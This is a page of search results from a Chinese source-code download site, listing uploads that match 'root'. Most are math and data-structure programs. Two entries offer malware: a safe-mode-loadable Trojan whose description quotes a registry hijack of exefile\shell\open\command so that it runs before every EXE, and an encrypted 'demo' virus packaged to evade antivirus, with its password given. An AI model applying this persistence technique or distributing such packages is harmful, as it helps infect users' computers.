CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 源码下载 Windows编程 搜索资源 - ROOT

搜索资源列表

  1. CXroot

    0下载:
  2. 求多项式方程的根,数值迭代,n次多项式-Polynomial equation for the root
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-15
    • 文件大小:4939
    • 提供者:lizzie
  1. squareroot

    0下载:
  2. 利用平方根法解线性方程组源程序及流程图。-Solving the use of the square root of linear equations and the flow chart of the source code.
  3. 所属分类:Windows Develop

    • 发布日期:2017-03-31
    • 文件大小:5020
    • 提供者:kelly
  1. hackerer

    0下载:
  2. 可以在安全模式加载的木马源代码 写注册项 (#根类, “exefile\shell\open\command\”, 取特定目录 (9) + “penguin01.exe ” + #引号 + “ 1” + #引号 + “ *”) 靠着这条就无敌啦``` 运行任意EXE文件 都会先运行病毒文件.-Can be loaded in safe mode Trojan registration of the source code to write (# root category, &qu
  3. 所属分类:Other systems

    • 发布日期:2017-04-17
    • 文件大小:37892
    • 提供者:娃哈哈
  1. Calculator

    0下载:
  2. 自己实现的一个简单的计算器,支持大数的加减乘除、开平方等操作,不适用库函数。-Themselves to achieve a simple calculator, to support the addition and subtraction, multiplication and division of large numbers, such as square root operations, library functions do not apply.
  3. 所属分类:Other windows programs

    • 发布日期:2017-03-30
    • 文件大小:2708
    • 提供者:cgy
  1. 1.6

    0下载:
  2. 这是一个二分法求方程根的程序,希望设计思路对你有所启发,共同交流-This is an equation for the root of the dichotomy procedure, you want to design some enlightenment, common exchange
  3. 所属分类:CSharp

    • 发布日期:2017-04-09
    • 文件大小:8392
    • 提供者:刘烨
  1. ChooseDir

    0下载:
  2. CDirectoryTree is based off of CTreeCtrl and automatically fills itself in with the directory information. It does not display any files underneath the directories, only the directories themselves. As users change directories, only the current
  3. 所属分类:TreeView

    • 发布日期:2017-05-09
    • 文件大小:2529868
    • 提供者:翁經堯
  1. sqrt_01

    0下载:
  2. 所属分类:Other systems

    • 发布日期:2017-04-11
    • 文件大小:1114
    • 提供者:DK
  1. trees

    0下载:
  2. 树的和 ★问题描述 LISP是一种高级语言,可以用它来表示其它的数据结构,例如二叉树。二叉树由LISP的S 表达式来表示,其规则如下: 空树=() 树= (整数 左子树 右子树) 叶节点=(整数 () ()) ★编程任务 问题是给定一棵由LISP的S表达式决定的二叉树,问是否存在一条从根到叶节点的路径 P,使这条路径上所有节点的和等于一个给定的整数I。 ★数据输入 由文件input.txt给出输入数据。每个输入数据包含多组数据,每组数据包含一个整数I和
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-04
    • 文件大小:889103
    • 提供者:skyalone
  1. bstcnt(1)

    0下载:
  2. 二叉搜索树(Binary Search Tree)是满足如下性质的二叉树: ①若它的左子树非空,则左子树上所有结点的值均小于根结点的值; ②若它的右子树非空,则右子树上所有结点的值均大于根结点的值; ③左、右子树本身又各是一棵二叉搜索树。-Binary Search Tree (Binary Search Tree) is to meet the nature of the binary tree as follows: ① If its non-empty left subtree
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-02
    • 文件大小:190221
    • 提供者:czjy
  1. 1

    0下载:
  2. 本程序可求用户定义的函数在指定区间上的根,编程时以f(x)=x^3为例 使用时只需修改f的定义即可-This procedure rectifiable user-defined functions in the specified interval on the root, programming when f (x) = x ^ 3 as an example when used only to modify the definition of f
  3. 所属分类:Other windows programs

    • 发布日期:2017-04-04
    • 文件大小:208182
    • 提供者:sy
  1. 1

    0下载:
  2.   在一般的数据结构的书中,树的那章后面,著者一般都会介绍一下哈夫曼(HUFFMAN)树和哈夫曼编码。哈夫曼编码是哈夫曼树的一个应用。哈夫曼编码应用广泛,如JPEG中就应用了哈夫曼编码。   首先介绍什么是哈夫曼树。哈夫曼树又称最优二叉树,是一种带权路径长度最短的二叉树。所谓树的带权路径长度,就是树中所有的叶结点的权值乘上其到根结点的路径长度(若根结点为0层,叶结点到根结点的路径长度为叶结点的层数)。树的带权路径长度记为WPL=(W1*L1+W2*L2+W3*L3+...+Wn*Ln),N
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-10
    • 文件大小:1151
    • 提供者:white Snow
  1. ali2

    0下载:
  2. process a math string & find the 4th root
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-07
    • 文件大小:767
    • 提供者:aliirooni
  1. testProgLinkedQueu

    0下载:
  2. 每个组件的side都是相对于它的父组件 (也就是说,button的side是在frame中的side,而跟root没有直接联系)-Side of each component are compared with its parent component (that is, button in the frame of the side of the side, and there is no direct contact with the root)
  3. 所属分类:GDI-Bitmap

    • 发布日期:2017-04-05
    • 文件大小:29267
    • 提供者:黄金
  1. FibinacciNumber

    0下载:
  2. 最后调用 root 的 mainloop 方法 . 它进入 Tk 事件循环(event loop), 这样,应用程序将等待,直到 quit 方法被调用 (就是点击 QUIT button), 或者窗口被关闭. -Finally, call the mainloop method root. It into the Tk event loop (event loop), so, the application will wait until the quit method is called
  3. 所属分类:GDI-Bitmap

    • 发布日期:2017-03-23
    • 文件大小:2466
    • 提供者:黄金
  1. LabManual

    0下载:
  2. 最后调用 root 的 mainloop 方法 . 它进入 Tk 事件循环(event loop), 这样,应用程序将等待,直到 quit 方法被调用 (就是点击 QUIT button), 或者窗口被关闭. -Finally, call the mainloop method root. It into the Tk event loop (event loop), so, the application will wait until the quit method is called
  3. 所属分类:GDI-Bitmap

    • 发布日期:2017-03-26
    • 文件大小:5877
    • 提供者:黄金
  1. cc

    0下载:
  2. 分析的是实例 #include<stdio.h> #include<stdlib.h> typedef struct BST* tree_pointer //定义数据类型 typedef struct BST{ int key tree_pointer left tree_pointer right }BST tree_pointer CreateBST(tree_pointer root, int data)
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-07
    • 文件大小:73043
    • 提供者:林明
  1. mathFunction

    0下载:
  2. 使用整數型計算平方根,sine及cosine,適合速度高但不要求太精準的軟件,特別適合篏入系統-Calculated using the square root of an integer type, sine and cosine, suitable for high speed but does not require software too precise, and are particularly suited to the embedded system
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-14
    • 文件大小:2871
    • 提供者:Jackie
  1. Multi_user_multi_level_directory_of_the_file_syste

    0下载:
  2. 多用户多级目录文件系统 功能:模拟Dos文件系统实现文件目录管理 进入控制台之后,可用命令有: "create"(创建文件或目录), "open"(打开文件或目录), "read"(读取文件内容,必须先打开文件), "write"(写入内容到文件,必须先打开文件), "close"(关闭文件或目录), "delete"(删除文件或目录), "mkdir", "cd"(进入目录), "dir"(查看目录结构), "logout"(退出登陆) 登陆用户名:root 密码:root-M
  3. 所属分类:Other windows programs

    • 发布日期:2017-04-02
    • 文件大小:251772
    • 提供者:hengdd
  1. calc1.3

    0下载:
  2. single app that implements a calculator that evaluates an expression written in natural way. For example 3+5*(sqrt(9)) where sqrt y square root. any question? write me at croccifixio29@hotmail.com-single app that implements a calculator that evaluat
  3. 所属分类:ActiveX-DCOM-ATL

    • 发布日期:2017-03-30
    • 文件大小:60137
    • 提供者:CROCCIFIXIO
  1. viruscode

    0下载:
  2. windows下病毒原理演示代码,无攻击性。(如:在c根目录下生成一个空文件夹)为防备杀毒软件查杀,内容已加密,解密密码zrb 内部exe文件已改为txt格式 可直接txt打开阅读代码也可改为exe运行尝试-principle demonstration of the virus under the windows code, non-offensive. (Eg: in c root to generate an empty folder) to prepare for killing ant
  3. 所属分类:Other systems

    • 发布日期:2017-04-01
    • 文件大小:34654
    • 提供者:hwl
« 1 2 ... 4 5 6 7 8 910 11 12 13 14 ... 50 »
搜珍网 www.dssz.com